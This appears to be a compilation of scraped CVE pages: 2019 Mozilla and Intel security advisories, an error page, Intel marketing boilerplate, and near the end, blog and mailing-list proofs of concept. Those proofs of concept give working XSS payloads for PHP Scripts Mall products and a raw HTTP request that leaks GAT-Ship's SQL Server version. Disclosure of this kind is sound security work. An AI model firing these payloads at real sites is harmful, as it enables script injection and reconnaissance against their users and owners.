The Tribulant Newsletters plugin before 4.6.19 for WordPress allows XSS via the wp-admin/admin-ajax.php?action=newsletters_load_new_editor contentarea parameter.

CVE-2019-14787: Newsletters

A type confusion vulnerability can occur when manipulating JavaScript objects due to issues in Array.pop. This can allow for an exploitable crash. We are aware of targeted attacks in the wild abusing this flaw. This vulnerability affects Firefox ESR < 60.7.1, Firefox < 67.0.3, and Thunderbird < 60.7.2.

**Mozilla Foundation Security Advisory 2019-20**

Announced

June 20, 2019

Impact

high

Products

Thunderbird

Fixed in

*   Thunderbird 60.7.2

_In general, these flaws cannot be exploited through email in the Thunderbird product because scripting is disabled when reading mail, but are potentially risks in browser or browser-like contexts._

**#CVE-2019-11707: Type confusion in Array.pop**

Reporter

Samuel Groß of Google Project Zero, Coinbase Security

Impact

critical

**Description**

A type confusion vulnerability can occur when manipulating JavaScript objects due to issues in Array.pop. This can allow for an exploitable crash. We are aware of targeted attacks in the wild abusing this flaw.

**References**

*   Bug 1544386

**#CVE-2019-11708: sandbox escape using Prompt:Open**

Reporter

Coinbase Security

Impact

high

**Description**

Insufficient vetting of parameters passed with the Prompt:Open IPC message between child and parent processes can result in the non-sandboxed parent process opening web content chosen by a compromised child process. When combined with additional vulnerabilities this could result in executing arbitrary code on the user's computer.

**References**

*   Bug 1559858

CVE-2019-11707: Security vulnerabilities fixed in Thunderbird 60.7.2

As part of a winning Pwn2Own entry, a researcher demonstrated a sandbox escape by installing a malicious language pack and then opening a browser feature that used the compromised translation. This vulnerability affects Firefox ESR < 60.8, Firefox < 68, and Thunderbird < 60.8.

Sorry, I can't find "_1538007?cve=title_". It does not seem like bug number nor an alias to a bug.

Please press **Back** and try again.

CVE-2019-9811: Invalid Bug ID

Activity Stream can display content from sent from the Snippet Service website. This content is written to innerHTML on the Activity Stream page without sanitization, allowing for a potential access to other information available to the Activity Stream, such as browsing history, if the Snipper Service were compromised. This vulnerability affects Firefox < 68.

**Mozilla Foundation Security Advisory 2019-21**

Announced

July 9, 2019

Impact

critical

Products

Firefox

Fixed in

*   Firefox 68

**#CVE-2019-9811: Sandbox escape via installation of malicious language pack**

Reporter

Niklas Baumstark

Impact

high

**Description**

As part of his winning Pwn2Own entry, Niklas Baumstark demonstrated a sandbox escape by installing a malicious language pack and then opening a browser feature that used the compromised translation.

**References**

*   Bug 1538007
*   Bug 1539598
*   Bug 1539759
*   Bug 1523741
*   Bug 1563327

**#CVE-2019-11711: Script injection within domain through inner window reuse**

Reporter

Boris Zbarsky

Impact

high

**Description**

When an inner window is reused, it does not consider the use of document.domain for cross-origin protections. If pages on different subdomains ever cooperatively use document.domain, then either page can abuse this to inject script into arbitrary pages on the other subdomain, even those that did not use document.domain to relax their origin security.

**References**

*   Bug 1552541

**#CVE-2019-11712: Cross-origin POST requests can be made with NPAPI plugins by following 308 redirects**

Reporter

Gregory Smiley of Security Compass

Impact

high

**Description**

POST requests made by NPAPI plugins, such as Flash, that receive a status 308 redirect response can bypass CORS requirements. This can allow an attacker to perform Cross-Site Request Forgery (CSRF) attacks.

**References**

*   Bug 1543804

**#CVE-2019-11713: Use-after-free with HTTP/2 cached stream**

Reporter

Hanno Böck

Impact

high

**Description**

A use-after-free vulnerability can occur in HTTP/2 when a cached HTTP/2 stream is closed while still in use, resulting in a potentially exploitable crash.

**References**

*   Bug 1528481

**#CVE-2019-11714: NeckoChild can trigger crash when accessed off of main thread**

Reporter

Hanno Böck

Impact

moderate

**Description**

Necko can access a child on the wrong thread during UDP connections, resulting in a potentially exploitable crash in some instances.

**References**

*   Bug 1542593

**#CVE-2019-11729: Empty or malformed p256-ECDH public keys may trigger a segmentation fault**

Reporter

Jonas Allmann

Impact

moderate

**Description**

Empty or malformed p256-ECDH public keys may trigger a segmentation fault due values being improperly sanitized before being copied into memory and used.

**References**

*   Bug 1515342

**#CVE-2019-11715: HTML parsing error can contribute to content XSS**

Reporter

Linus Särud

Impact

moderate

**Description**

Due to an error while parsing page content, it is possible for properly sanitized user input to be misinterpreted and lead to XSS hazards on web sites in certain circumstances.

**References**

*   Bug 1555523

**#CVE-2019-11716: globalThis not enumerable until accessed**

Reporter

Chris Hacking

Impact

moderate

**Description**

Until explicitly accessed by script, window.globalThis is not enumerable and, as a result, is not visible to code such as Object.getOwnPropertyNames(window). Sites that deploy a sandboxing that depends on enumerating and freezing access to the window object may miss this, allowing their sandboxes to be bypassed.

**References**

*   Bug 1552632

**#CVE-2019-11717: Caret character improperly escaped in origins**

Reporter

Tyson Smith

Impact

moderate

**Description**

A vulnerability exists where the caret ("^") character is improperly escaped constructing some URIs due to it being used as a separator, allowing for possible spoofing of origin attributes.

**References**

*   Bug 1548306

**#CVE-2019-11718: Activity Stream writes unsanitized content to innerHTML**

Reporter

Mark Banner

Impact

moderate

**Description**

Activity Stream can display content from sent from the Snippet Service website. This content is written to innerHTML on the Activity Stream page without sanitization, allowing for a potential access to other information available to the Activity Stream, such as browsing history, if the Snipper Service were compromised.

**References**

*   Bug 1408349

**#CVE-2019-11719: Out-of-bounds read when importing curve25519 private key**

Reporter

Henry Corrigan-Gibbs

Impact

moderate

**Description**

When importing a curve25519 private key in PKCS#8format with leading 0x00 bytes, it is possible to trigger an out-of-bounds read in the Network Security Services (NSS) library. This could lead to information disclosure.

**References**

*   Bug 1540541

**#CVE-2019-11720: Character encoding XSS vulnerability**

Reporter

Rakesh Mane

Impact

moderate

**Description**

Some unicode characters are incorrectly treated as whitespace during the parsing of web content instead of triggering parsing errors. This allows malicious code to then be processed, evading cross-site scripting (XSS) filtering.

**References**

*   Bug 1556230

**#CVE-2019-11721: Domain spoofing through unicode latin 'kra' character**

Reporter

Anonymous

Impact

moderate

**Description**

The unicode latin 'kra' character can be used to spoof a standard 'k' character in the addressbar. This allows for domain spoofing attacks as do not display as punycode text, allowing for user confusion.

**References**

*   Bug 1256009

**#CVE-2019-11730: Same-origin policy treats all files in a directory as having the same-origin**

Reporter

Luigi Gubello

Impact

moderate

**Description**

A vulnerability exists where if a user opens a locally saved HTML file, this file can use file: URIs to access other files in the same directory or sub-directories if the names are known or guessed. The Fetch API can then be used to read the contents of any files stored in these directories and they may uploaded to a server. Luigi Gubello demonstrated that in combination with a popular Android messaging app, if a malicious HTML attachment is sent to a user and they opened that attachment in Firefox, due to that app's predictable pattern for locally-saved file names, it is possible to read attachments the victim received from other correspondents.

**References**

*   Bug 1558299

**#CVE-2019-11723: Cookie leakage during add-on fetching across private browsing boundaries**

Reporter

Andreas Wagner

Impact

low

**Description**

A vulnerability exists during the installation of add-ons where the initial fetch ignored the origin attributes of the browsing context. This could leak cookies in private browsing mode or across different "containers" for people who use the Firefox Multi-Account Containers Web Extension.

**References**

*   Bug 1528335

**#CVE-2019-11724: Retired site input.mozilla.org has remote troubleshooting permissions**

Reporter

Frederik Braun

Impact

low

**Description**

Application permissions give additional remote troubleshooting permission to the site input.mozilla.org, which has been retired and now redirects to another site. This additional permission is unnecessary and is a potential vector for malicious attacks.

**References**

*   Bug 1512511

**#CVE-2019-11725: Websocket resources bypass safebrowsing protections**

Reporter

Andrey

Impact

low

**Description**

When a user navigates to site marked as unsafe by the Safebrowsing API, warning messages are displayed and navigation is interrupted but resources from the same site loaded through websockets are not blocked, leading to the loading of unsafe resources and bypassing safebrowsing protections.

**References**

*   Bug 1483510

**#CVE-2019-11727: PKCS#1 v1.5 signatures can be used for TLS 1.3**

Reporter

Hubert Kario

Impact

low

**Description**

A vulnerability exists where it possible to force Network Security Services (NSS) to sign CertificateVerify with PKCS#1 v1.5 signatures when those are the only ones advertised by server in CertificateRequest in TLS 1.3. PKCS#1 v1.5 signatures should not be used for TLS 1.3 messages.

**References**

*   Bug 1552208

**#CVE-2019-11728: Port scanning through Alt-Svc header**

Reporter

Trishita Tiwari, Ari Trachtenberg

Impact

low

**Description**

The HTTP Alternative Services header, Alt-Svc, can be used by a malicious site to scan all TCP ports of any host that the accessible to a user when web content is loaded.

**References**

*   Bug 1552993

**#CVE-2019-11710: Memory safety bugs fixed in Firefox 68**

Reporter

Mozilla developers and community

Impact

critical

**Description**

Mozilla developers and community members André Bargull, Christian Holler, Natalia Csoregi, Raul Gurzau, Daniel Varga, Jon Coppeard, Marcia Knous, Gary Kwong, Randell Jesup, David Bolter, Jeff Gilbert, and Deian Stefan reported memory safety bugs present in Firefox 67. Some of these bugs showed evidence of memory corruption and we presume that with enough effort that some of these could be exploited to run arbitrary code.

**References**

*   Memory safety bugs fixed in Firefox 68

**#CVE-2019-11709: Memory safety bugs fixed in Firefox 68 and Firefox ESR 60.8**

Reporter

Mozilla developers and community

Impact

critical

**Description**

Mozilla developers and community members Andreea Pavel, Christian Holler, Honza Bambas, Jason Kratzer, and Jeff Gilbert reported memory safety bugs present in Firefox 67 and Firefox ESR 60.7. Some of these bugs showed evidence of memory corruption and we presume that with enough effort that some of these could be exploited to run arbitrary code.

**References**

*   Memory safety bugs fixed in Firefox 68 and Firefox ESR 60.8

CVE-2019-11718: Security vulnerabilities fixed in Firefox 68

Insufficient password protection in the attestation database for Open CIT may allow an authenticated user to potentially enable information disclosure via local access.

**Select Your Region**

Sign In to access restricted content

**Using Intel.com Search**

You can easily search the entire Intel.com site in several ways.

*   Brand Name: **Core i9**
*   Document Number: **123456**
*   Code Name: **Alder Lake**
*   Special Operators: **“Ice Lake”, Ice AND Lake, Ice OR Lake, Ice\***

**Quick Links**

You can also try the quick links below to see results for most popular searches.

*   Product Information
*   Support
*   Drivers & Software

**Recent Searches**

Sign In to access restricted content

**Advanced Search**

**Only search in**

Title Description Content ID

Sign in to access restricted content.

The browser version you are using is not recommended for this site.  
Please consider upgrading to the latest version of your browser by clicking one of the following links.

*   Safari
*   Chrome
*   Edge
*   Firefox

**Open Cloud Integrity Technology and OpenAttestation Advisory**

**Summary: **

Multiple potential security vulnerabilities in Open Cloud Integrity Technology (Open CIT) and OpenAttestation may allow information disclosure. Intel is releasing software updates to mitigate these potential vulnerabilities.

**Vulnerability Details:**

CVEID: CVE-2019-0179

Description: Insufficient password protection in the attestation database for Open CIT may allow an authenticated user to potentially enable information disclosure via local access.

CVSS Base Score: 4.4 Medium

CVSS Vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N

CVEID: CVE-2019-0180

Description: Insufficient password protection in the configuration files for Open CIT may allow an authenticated user to potentially enable information disclosure via local access.

CVSS Base Score: 4.4 Medium

CVSS Vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N

CVEID: CVE-2019-0178

Description: A race condition in the agent service for Open CIT may allow an authenticated user to potentially enable escalation of privilege via local access.

CVSS Base Score: 4.4 Medium

CVSS Vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N

CVEID: CVE-2019-0177

Description: Insufficient input validation in the attestation process for Open CIT may allow an authenticated user to potentially enable escalation of privilege via local access.

CVSS Base Score: 4.4 Medium

CVSS Vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N

CVEID: CVE-2019-0175

Description: Insufficient session validation in the attestation process for OpenAttestation may allow an authenticated user to potentially enable escalation of privilege via local access.

CVSS Base Score: 4.4 Medium

CVSS Vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N

CVEID: CVE-2019-0181

Description: Improper input validation in the database for Open CIT and OpenAttestation may allow a privileged user to potentially enable escalation of privilege via local access.

CVSS Base Score: 6.7 Medium

CVSS Vector: CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

CVEID: CVE-2019-0182

Description: Relative path traversal in the login routine for Open CIT and OpenAttestation may allow an authenticated user to potentially enable escalation of privilege via local access.

CVSS Base Score: 3.3 Low

CVSS Vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

CVEID: CVE-2019-0183

Description: Insufficient password handling in the login routine for Open CIT may allow an authenticated user to potentially enable escalation of privilege via local access.

CVSS Base Score: 3.3 Low

CVSS Vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

CVEID: CVE-2019-11092

Description: Insufficient password handling in the login routine for Open CIT may allow an authenticated user to potentially enable escalation of privilege via local access.

CVSS Base Score: 4.4 Medium

CVSS Vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N

**Affected Products:**

All versions of Open CIT and OpenAttestation.

**Recommendation:**

Intel recommends users of Open CIT and OpenAttestation discontinue use and move to Intel® Security Libraries for Data Center (Intel® SecL-DC).

Updates are available for download at this location: https://01.org/intel-secl

**Acknowledgements:**

These issues were found internally by Intel.

Intel, and nearly the entire technology industry, follows a disclosure practice called Coordinated Disclosure, under which a cybersecurity vulnerability is generally publicly disclosed only after mitigations are deployed.

**Revision History**

Revision

Date

Description

1.0

06/11/2019  

Initial Release

**Legal Notices and Disclaimers**

Intel provides these materials as-is, with no express or implied warranties.

All products, dates, and figures specified are preliminary based on current expectations, and are subject to change without notice.

Intel products and services described may contain design defects or errors known as errata, which may cause the product to deviate from published specifications. Current characterized errata are available on request.

Intel products that have met their End of Servicing Updates may no longer receive functional and security updates. For additional details on support and servicing, please see this help article. 

Intel technologies’ features and benefits depend on system configuration and may require enabled hardware, software or service activation. Performance varies depending on system configuration. No product or component can be absolutely secure. Check with your system manufacturer or retailer or learn more at http://intel.com.

Some results have been estimated or simulated using internal Intel analysis or architecture simulation or modeling, and provided to you for informational purposes. Any differences in your system hardware, software or configuration may affect your actual performance.

Intel and the Intel logo are trademarks of Intel Corporation or its subsidiaries in the United States and other countries.

\*Other names and brands may be claimed as the property of others.  

Copyright © Intel Corporation 2022

**Report a Vulnerability**

If you have information about a security issue or vulnerability with an **Intel branded product or technology**, please send an e-mail to secure@intel.com. Encrypt sensitive information using our PGP public key.

Please provide as much information as possible, including:

*   The products and versions affected
*   Detailed description of the vulnerability
*   Information on known exploits

A member of the Intel Product Security Team will review your e-mail and contact you to collaborate on resolving the issue. For more information on how Intel works to resolve security issues, see:

*   Vulnerability handling guidelines

For issues related to Intel's external web presence (Intel.com and related subdomains), please contact Intel's External Security Research team.

**Need product support?**

If you...

*   Have questions about the security features of an Intel product
*   Require technical support
*   Want product updates or patches

  
Please visit Support & Downloads.

*   Report a Vulnerability
*   Product Support

CVE-2019-0181: INTEL-SA-00248

**Select Your Region**

Sign In to access restricted content

**Using Intel.com Search**

You can easily search the entire Intel.com site in several ways.

*   Brand Name: **Core i9**
*   Document Number: **123456**
*   Code Name: **Alder Lake**
*   Special Operators: **“Ice Lake”, Ice AND Lake, Ice OR Lake, Ice\***

**Quick Links**

You can also try the quick links below to see results for most popular searches.

*   Product Information
*   Support
*   Drivers & Software

**Recent Searches**

Sign In to access restricted content

**Advanced Search**

**Only search in**

Title Description Content ID

Sign in to access restricted content.

The browser version you are using is not recommended for this site.  
Please consider upgrading to the latest version of your browser by clicking one of the following links.

*   Safari
*   Chrome
*   Edge
*   Firefox

**Intel® Xeon® W Processors**

Helping deliver a giant leap in performance and platform capabilities for professional creatives, engineers and data scientists.

Learn more

Innovation

**4th Gen Intel® Xeon® Scalable Processors**

With the most built-in accelerators of any CPU on the market, 4th Gen Intel® Xeon® Scalable processors accelerate performance for AI and other emerging workloads.

**Accelerate Your Most Advanced Edge Workloads**

Deliver performance, connectivity, memory, and accelerated AI with 4th Gen Intel® Xeon® Scalable processors for edge applications.

**Enable Edge Networks**

Improve network capacity and total cost of ownership while meeting power consumption and space requirements for 5G and network infrastructure.

**The Future of Acceleration Has Arrived**

Discover the future of acceleration with the launch of our highly anticipated 4th Gen Intel® Xeon® Scalable processors and other innovations.

Innovation

**Introducing Intel® Xeon® CPU Max Series**

Reduce the bottlenecks of memory-bound applications to deliver breakthrough performance with up to 56 performance cores, 64GB of high bandwidth memory, and cost and time savings with the only x86-based processor with high-bandwidth memory (HBM).

Data Center

**Introducing Intel® Data Center GPU Max Series**

Maximize impact with the Intel® Data Center GPU Max Series, Intel’s highest performing, highest density, general-purpose discrete GPU, which packs over 100 billion transistors into one package and contains up to 128 Xe Cores–Intel’s foundational GPU compute building block.

Innovation

**Intel at Mobile World Congress Barcelona**

Join us at MWC Barcelona to experience how Intel is speeding the shift to fully programmable, software-defined, cloud-native networks that unleash the possibilities of 5G, AI, and the Intelligent Edge.

Innovation

**13th Gen Intel® Core™ Mobile Processors for Edge**

With industrial-grade features and extended temperature ranges of -40C to 100C (available on select SKUs), 13th Gen Intel® Core™ mobile processors combine power efficiency and consistent performance for AI, graphics, and industrial-grade apps.

CVE-2019-0177: Intel | Data Center Solutions, IoT, and PC Innovation

PHP Scripts Mall Chartered Accountant : Auditor Website 2.0.1 has Stored XSS in the Profile Update page via the My Name field.

**CVE-2019-7553 Stores XSS in PHP Scripts Mall Chartered Accountant : Auditor Website 2.0.1**

**_DESCRIPTION_**

**PHP Scripts Mall Chartered Accountant : Auditor Website 2.0.1 has**  
 **Stored XSS in the Profile Update page via the My Name field.**  

**_VENDOR_**

PHP Scripts Mall Pvt. Ltd.  
 _\[Affected Product Code Base\]_PHP Scripts Mall Chartered Accountant : Auditor Website - 2.0.1  
  

**_POC_**

 Steps to reproduce-

Go to http://74.124.215.220/~projclient/client/auditor

 1. Register and login an account.

2\. GO to My Profile and update the My name field with the xss payload

  <--\`<img/src=\` onerror=alert("Pw")> --!>.

3\. The xss will be executed throughout all the pages visited.

**Popular posts from this blog**

DESCRIPTION An issue was discovered in PHP Scripts Mall Investment MLM Software 2.0.2.  Stored XSS was found in the the My Profile Section. This is due to lack of sanitization in the Edit Name section. VENDOR PHP Scripts Mall Pvt. Ltd.   \[Affected Product Code Base\] Investment MLM Software(link- https://www.phps criptsmall.com/product/investm ent-mlm/ ) - 2.0.2 POC 1.GO to  http://198.38.86.159/~onlineex amboard/demo/investment-mlm/ 2. Request a test account "Click Here For User Demo Link" 3. Login and go to my profile. 4. Input payload  <script>alert(document.domain) </script>  and xss gets popped. PROOF

DESCRIPTION An issue was discovered in PHP Scripts Mall API Based Travel Booking 3.4.7. There is Reflected XSS via the flight-results.php d2 parameter. Tested in Firefox Dev Edition VENDOR PHP Scripts Mall Pvt. Ltd.   \[Affected Product Code Base\] API based travel booking - 3.4.7 POC 1.GO to  http://74.124.215.220/~config/cleotravel/flight-results.php?a1=adf&a2=adfdf&d1=&d2=%22Style=%22position:fixed;top:0;left:0;font-size:999px;%22OnMouseEnter=%22confirm\`K\`%22 REFLECTED XSS POPPED

CVE-2019-7553: CVE-2019-7553 Stores XSS in PHP Scripts Mall Chartered Accountant : Auditor Website 2.0.1

GAT-Ship Web Module through 1.30 allows remote attackers to obtain potentially sensitive information via {} in a ws/gatshipWs.asmx/SqlVersion request.

**Full Disclosure mailing list archives****GAT-Ship Web Module >1.30 - Unauthenticated Information Disclosure Vulnerability**

_From_: <gionreale () tutanota com>  
_Date_: Fri, 17 May 2019 13:43:49 +0200 (CEST)  

GAT-Ship Web Module >1.30 - Unauthenticated Information Disclosure Vulnerability


It is possible in versions 1.30 and below for unauthenticated attackers to query the GAT-Ship Web Module for system 
information via a crafted request:

PoC:
---------------------------------------------------------------------------------------------------------------------------------------

POST /ws/gatshipWs.asmx/SqlVersion <http://gatshipWs.asmx/SqlVersion\> HTTP/1.1
 User-Agent: Mozilla/5.0 (X11; Linux x86\_64; rv:52.0) Gecko/20100101 Firefox/52.0
 Accept: application/json, text/javascript, \*/\*; q=0.01
 Accept-Language: en-US,en;q=0.5
 Accept-Encoding: gzip, deflate
 Content-Type: application/json; charset=utf-8
 X-Requested-With: XMLHttpRequest 
 Content-Length: 2
 DNT: 1
 Connection: close
 
 {}

--------------------------------------------------------------------------------------------------------------------------------------------------




HTTP/1.1 200 OK
 Cache-Control: private, max-age=0
 Content-Type: application/json; charset=utf-8
 Server: Microsoft-IIS/X.X
 X-AspNet-Version: X.X.XXXXX
 X-Powered-By: ASP.NET
 Date: Mon, XX XXX 20XX 06:55:31 GMT
 Connection: close
 Content-Length: 310
 
 {"d":{"\_\_type":"webModule.ws.gatshipWs+ResponsObject","ResponsType":0,"MessageText":null,"Data":"Microsoft SQL Server 
20XX (SPX) - XX.X.XXXX.X (X64) \\n\\tDec 28 20XX 20:23:12 \\n\\tCopyright (c) Microsoft Corporation\\n\\tStandard Edition 
(64-bit) on Windows XX XX \\u003cX64\\u003e (Build XXXX: Service Pack X)\\n"}}

===================================================================================

Values in PoC removed for security reasons.


Disclosed: 16 Jul 2018

Fix: Upgrade to current version.


Discovered by Gionathan Armando Reale


\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

**Current thread:**

*   **GAT-Ship Web Module >1.30 - Unauthenticated Information Disclosure Vulnerability** _gionreale (May 17)_
    *   Re: GAT-Ship Web Module >1.30 - Unauthenticated Information Disclosure Vulnerability _gionreale (May 21)_

CVE-2019-12163: Full Disclosure: GAT-Ship Web Module >1.30

Insufficient input validation vulnerability in subsystem for Intel(R) AMT before version 12.0.35 may allow a privileged user to potentially enable denial of service via network access.

**Select Your Region**

Sign In to access restricted content

**Using Intel.com Search**

You can easily search the entire Intel.com site in several ways.

*   Brand Name: **Core i9**
*   Document Number: **123456**
*   Code Name: **Alder Lake**
*   Special Operators: **“Ice Lake”, Ice AND Lake, Ice OR Lake, Ice\***

**Quick Links**

You can also try the quick links below to see results for most popular searches.

*   Product Information
*   Support
*   Drivers & Software

**Recent Searches**

Sign In to access restricted content

**Advanced Search**

**Only search in**

Title Description Content ID

Sign in to access restricted content.

The browser version you are using is not recommended for this site.  
Please consider upgrading to the latest version of your browser by clicking one of the following links.

*   Safari
*   Chrome
*   Edge
*   Firefox

**Intel® CSME, Intel® SPS, Intel® TXE, Intel® DAL, and Intel® AMT 2019.1 QSR Advisory**

Intel ID:

INTEL-SA-00213

Advisory Category:

Firmware, Software

Impact of vulnerability:

Escalation of Privilege, Denial of Service, Information Disclosure

Severity rating:

HIGH

Original release:

05/14/2019

Last revised:

04/14/2020

**Summary: **

Multiple potential security vulnerabilities in Intel® Converged Security & Management Engine (Intel® CSME), Intel® Server Platform Services (Intel® SPS), Intel® Trusted Execution Engine Interface (Intel® TXE), Intel® Dynamic Application Loader (Intel® DAL), and Intel® Active Management Technology (Intel® AMT) may allow escalation of privilege, information disclosure, and/or denial of service. Intel is releasing Intel® CSME, Intel® SPS, Intel® TXE, and Intel® AMT updates to mitigate these potential vulnerabilities.

**Vulnerability Details:**

CVEID: CVE-2019-0089

Description: Improper data sanitization vulnerability in subsystem in Intel(R) SPS before versions SPS\_E5\_04.00.04.381.0, SPS\_E3\_04.01.04.054.0, SPS\_SoC-A\_04.00.04.181.0, and SPS\_SoC-X\_04.00.04.086.0 may allow a privileged user to potentially enable escalation of privilege via local access.

CVSS Base Score: 8.1 High

CVSS Vector: CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:C/C:L/I:H/A:H

CVEID: CVE-2019-0090

Description:  Insufficient access control vulnerability in subsystem for Intel(R) CSME versions 11.x, Intel(R) CSME version 12.0.35, Intel(R) TXE versions 3.x, 4.x, Intel(R) Server Platform Services versions 3.x, 4.x, before SPS\_E3\_05.01.03.094.0 may allow an unauthenticated user to potentially enable escalation of privilege via physical access.

CVSS Base Score: 7.1 High  

CVSS Vector: CVSS:3.0/AV:P/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H

CVEID: CVE-2019-0086

Description: Insufficient access control vulnerability in Dynamic Application Loader software for Intel(R) CSME before versions 11.8.65, 11.11.65, 11.22.65, 12.0.35 and Intel(R) TXE 3.1.65, 4.0.15 may allow an unprivileged user to potentially enable escalation of privilege via local access.

CVSS Base Score: 7.8 High

CVSS Vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

CVEID: CVE-2019-0091

Description: Code injection vulnerability in installer for Intel(R) CSME before versions 11.8.65, 11.11.65, 11.22.65, 12.0.35 and Intel(R) TXE 3.1.65, 4.0.15 may allow an unprivileged user to potentially enable escalation of privilege via local access.

CVSS Base Score: 6.6 Medium

CVSS Vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:U/C:N/I:H/A:H

CVEID: CVE-2019-0092

Description: Insufficient input validation vulnerability in subsystem for Intel(R) AMT before versions 11.8.65, 11.11.65, 11.22.65, 12.0.35 may allow an unauthenticated user to potentially enable escalation of privilege via physical access.

CVSS Base Score: 6.8 Medium

CVSS Vector: CVSS:3.0/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVEID: CVE-2019-0093

Description: Insufficient data sanitization vulnerability in HECI subsystem for Intel(R) CSME before versions 11.8.65, 11.11.65, 11.22.65, 12.0.35 and Intel(R) SPS before version SPS\_E3\_05.01.03.094.0 may allow a privileged user to potentially enable information disclosure via local access.

CVSS Base Score: 2.3 Low

CVSS Vector: CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N

CVEID: CVE-2019-0094

Description: Insufficient input validation vulnerability in subsystem for Intel(R) AMT before versions 11.8.65, 11.11.65, 11.22.65, 12.0.35 may allow an unauthenticated user to potentially enable denial of service via adjacent network access.

CVSS Base Score: 4.3 Medium

CVSS Vector: CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

CVEID: CVE-2019-0096

Description: Out of bound write vulnerability in subsystem for Intel(R) AMT before versions 11.8.65, 11.11.65, 11.22.65, 12.0.35 may allow an authenticated user to potentially enable escalation of privilege via adjacent network access.

CVSS Base Score: 6.7 Medium

CVSS Vector: CVSS:3.0/AV:A/AC:H/PR:L/UI:N/S:U/C:L/I:H/A:H

CVEID: CVE-2019-0097

Description: Insufficient input validation vulnerability in subsystem for Intel(R) AMT before version 12.0.35 may allow a privileged user to potentially enable denial of service via network access.

CVSS Base Score: 4.9 Medium

CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H

CVEID: CVE-2019-0098

Description: Logic bug vulnerability in subsystem for Intel(R) CSME before version 12.0.35, Intel(R) TXE before 3.1.65, 4.0.15 may allow an unauthenticated user to potentially enable escalation of privilege via physical access.

CVSS Base Score: 5.7 Medium

CVSS Vector: CVSS:3.0/AV:P/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N

CVEID: CVE-2019-0099

Description: Insufficient access control vulnerability in subsystem in Intel(R) SPS before version SPS\_E3\_05.01.03.094.0 may allow an unauthenticated user to potentially enable escalation of privilege via physical access.

CVSS Base Score: 5.7 Medium

CVSS Vector: CVSS:3.0/AV:P/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N

CVEID: CVE-2019-0153

Description: Buffer overflow in subsystem in Intel(R) CSME 12.0.0 through 12.0.34 may allow an unauthenticated user to potentially enable escalation of privilege via network access.  

CVSS Base Score: 9.0 Critical

CVSS Vector: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H

CVEID: CVE-2019-0170

Description: Buffer overflow in subsystem in Intel(R) DAL before version 12.0.35 may allow a privileged user to potentially enable escalation of privilege via local access.

CVSS Base Score: 8.2 High

CVSS Vector: CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

**Affected Products:**

Intel® CSME before versions 11.8.65, 11.11.65, 11.22.65, 12.0.35

Intel® CSME, Intel® Active Management Technology, and Intel® DAL

Updated Intel® CSME Firmware Version

Replaces Intel® CSME Firmware Version

11.8.65

11.0 thru 11.8.60

11.11.65

11.10 thru 11.11.60

11.22.65

11.20 thru 11.22.60

12.0.35

12.0 thru 12.0.20

Intel® Server Platform Services before versions SPS\_E3\_05.01.03.094.0, SPS\_E5\_04.00.04.381.0 and SPS\_E5\_04.01.04.054.0 

Intel® Server Platform Services

Updated Intel® Server Platform Services Firmware Version

Replaces Intel® Server Platform Services Firmware Version

SPS\_E3\_05.01.03.094.0, SPS\_SoC-A\_04.00.04.181.0 and SPS\_SoC-X\_04.00.04.086.0

SPS\_E3\_05.00.00.000.0 thru SPS\_E3\_05.00.04.027.0, SPS\_SoC-A\_04.00.00.000.0 thru SPS\_SoC-A\_04.00.04.177.0

SPS\_E5\_04.00.04.381.0

SPS\_E5\_04.00.00 through SPS\_E5\_04.00.03

SPS\_E5\_04.01.04.054.0

SPS\_E5\_04.01.00 through SPS\_E5\_04.01.03

Intel® Trusted Execution Engine before TXE 3.1.65, 4.0.15

Intel® Trusted Execution Engine

Updated Intel® Trusted Execution Engine Firmware Version

Replaces Intel® Trusted Execution Engine Firmware Version

3.1.65

3.0 thru 3.1.50

4.0.15

4.0 thru 4.0.5

**Note**:  Firmware versions of Intel® ME 3.x thru 10.x, Intel® TXE 1.x thru 2.x and Intel® Server Platform Services 1.x thru 2.X are no longer supported, thus were not assessed for the vulnerabilities/CVEs listed in this Technical Advisory. There is no new release planned for these versions.

**Recommendations:**

Intel recommends that users of Intel® CSME, Intel® SPS, Intel® TXE, Intel® DAL, and Intel® AMT update to the latest version provided by the system manufacturer that addresses these issues.

Consult updated security guidance for CVE-2019-0090 published here. Additional information on this vulnerability can be found in the CVE-2019-0090 Technical Whitepaper here. 

**Acknowledgements:**

Intel would like to thank Lasse Borup (CVE-2019-0086) for reporting this issue.

CVE-2019-0090 was initially found externally by an Intel partner and subsequently reported by Positive Technologies researchers. Intel would like to thank Mark Ermolov, Dmitry Sklyarov and Maxim Goryachy from Positive Technologies for reporting this issue.

